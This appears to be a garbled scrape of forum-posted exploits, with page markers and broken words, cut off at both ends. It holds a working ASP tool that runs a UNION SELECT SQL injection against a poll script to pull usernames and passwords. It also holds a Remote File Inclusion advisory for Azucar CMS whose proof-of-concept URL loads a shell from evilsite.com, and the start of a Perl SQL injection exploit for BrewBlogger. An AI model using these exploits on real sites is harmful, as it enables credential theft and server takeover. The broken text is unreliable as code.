arama=InStr1, targettext, "union" ,1 arama2=InStr1, targettext, "http://" ,1 If targettext="" Then Response.Redirect"exploit1.asp?islem=hata1" Else If arama>0 then Response.Redirect"expl
Trang 1ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="backgroun
d-color: #808080"><br><input type="text" name="id" value="1" size="25" styl e="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="default1.asp"
string2="default1.asp"
cek= Request.Form("id")
targettext = Request.Form("text1")
Trang 2arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1
target2 = targettext+string2
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
Open "POST" , come, FALSE
setRequestHeader "Content-Type", "application/x-www-form-urlencoded" send
"Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek
take = Responsetext
End With
SET objtake = Nothing
End Function
Public Function take1(come1)
Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake1
Open "POST" , come1, FALSE
setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
Trang 3send
"Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20wh ere%20user_id%20like%20"+cek
take1 = Responsetext
End With
SET objtake1 = Nothing
End Function
get_username = take(target1)
get_password = take1(target2)
getdata=InStr(get_username,"Poll Question:</b> " )
username=Mid(get_username,getdata+24,14)
passwd=Mid(get_password,getdata+24,14)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0"
style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> &n bsp;
<b><font size="2" face="Arial"> User Password:</font></b></td> <td width="50%"> <b><font color="#C0C0C0" size="2" face="Ver dana"><%=passwd%></font></b></td>
</tr>
Trang 4</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p
>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
Black_hat_cr(HCE)
Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability
Code:
+ -
+ Azucar CMS <= 1.3 (_VIEW) Remote File Include Vulnerability
+ -
+ Affected Software : Azucar CMS <= 1.3
+ Download : http://downloads.sourceforge.net/azucarcms/azucarcms1.3.zip
Trang 5+ Description : "Azucar is a modular content management system designed to
be extremely user friendly"
+ Class : Remote File Inclusion
+ Risk : High (Remote File Execution)
+ Found By : nuffsaid <nuffsaid[at]newbslove.us>
+ -
+ Details:
+ Azucar CMS admin/index_sitios.php uses the include function insecurely on the
$_GET[_VIEW]
+ paramater passed to the script, a remote file can be specified and executed on the server
+
+ Vulnerable Code:
+ admin/index_sitios.php, line(s) 14-15:
+ -> 14-15: if (isset($_GET[_VIEW])) include($_GET[_VIEW]);
+
+ Proof Of Concept:
+
http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php + -
black_hat_cr(HCE)
BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability
PHP Code:
#!/usr/bin/perl
##################################################################
#########################
#Target:
#
# BewBlogger 1.3.1
# http://brewblogger.zkdigital.com
#
#Vulnerability:
#
# SQL Injection
Trang 6#
#Description: